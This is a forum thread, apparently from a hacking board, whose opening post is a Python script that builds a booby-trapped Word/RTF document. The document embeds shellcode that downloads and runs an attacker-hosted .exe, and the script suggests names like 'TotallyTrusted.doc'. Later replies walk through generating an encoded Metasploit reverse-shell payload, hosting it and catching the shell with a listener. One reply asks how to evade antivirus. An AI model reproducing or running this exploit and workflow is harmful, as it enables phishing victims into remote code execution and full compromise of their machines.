M2G Posted February 23, 2013 Report Posted February 23, 2013 #!/usr/bin/python# Exploit Title: MS Office 2010 Download Execute# Google Dork: NA# Date: 19 Feb 2013# Exploit Author: g11tch# Vendor Homepage:# Software Link:# Version: ALL# Tested on: [Windows XP SP1, SP2, Windows 7 ]# CVE :###########Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exeimport binasciiimport sysimport timeprint "Microsoft Office 2010, download -N- execute "print " What do you want to name your .doc ? "print " Example: TotallyTrusted.doc "filename = raw_input()print " What is the link to your .exe ? "print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "url = raw_input()print "Gears and Cranks working mag1c in the background "time.sleep(3)close="{}}}}}"binme=binascii.b2a_hex(url)file=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\n')textfile = open(filename , 'w')textfile.write(file.decode('base64')+binme+close)textfile.close()time.sleep(3)print "enjoy"Source 1 Quote
XgaMeR Posted May 27, 2013 Report Posted May 27, 2013 Imi explica cineva mai detaliat cum trebuie sa-l folosesc? Quote
neox Posted May 27, 2013 Report Posted May 27, 2013 (edited) Imi explica cineva mai detaliat cum trebuie sa-l folosesc?1.Creezi payload.exe cu metasploit localmsfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exesau folosesti trojan server.exe2.Urci serverul.exe pe un hosting gratis online 3.Folosesti exploitul in python 4.Daca ai folosit server trojan il chemi cu trojan respectiv5.Cu metasploit msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 EO problema este ca tipul care a facut exploitul nu a creat heder corect de la fisierul tip format .doc ca sa fie cit mai exact ca un document.docSi daca ai fantezie buna poti combina cu mai multe posibilitati Edited May 27, 2013 by neox 1 Quote
hostbob Posted January 21, 2014 Report Posted January 21, 2014 can you write a tut on how to re-fud this? Quote
Hir0sh1 Posted September 10, 2014 Report Posted September 10, 2014 i have tried that exploit along many others and on my side they don't work. The only way to exploit a .doc this days is if the person "enable" and "run" macros. Quote
dw8os Posted September 13, 2014 Report Posted September 13, 2014 hmm, metasploit allows to concat .doc and .exe Quote
Hir0sh1 Posted September 13, 2014 Report Posted September 13, 2014 yes,metasploit will create a doc or a pdf file. I was refering to the script posted by the original post. There is a 0day for both .doc and .pdf that will execute with no warnings use by the finfisher (gamma group) but it's not public yet. Quote
scarcium Posted October 7, 2014 Report Posted October 7, 2014 1.Creezi payload.exe cu metasploit localmsfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exesau folosesti trojan server.exe2.Urci serverul.exe pe un hosting gratis online 3.Folosesti exploitul in python 4.Daca ai folosit server trojan il chemi cu trojan respectiv5.Cu metasploit msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 EO problema este ca tipul care a facut exploitul nu a creat heder corect de la fisierul tip format .doc ca sa fie cit mai exact ca un document.docSi daca ai fantezie buna poti combina cu mai multe posibilitati Daca schimbam header?Oare are sa mearga? Quote
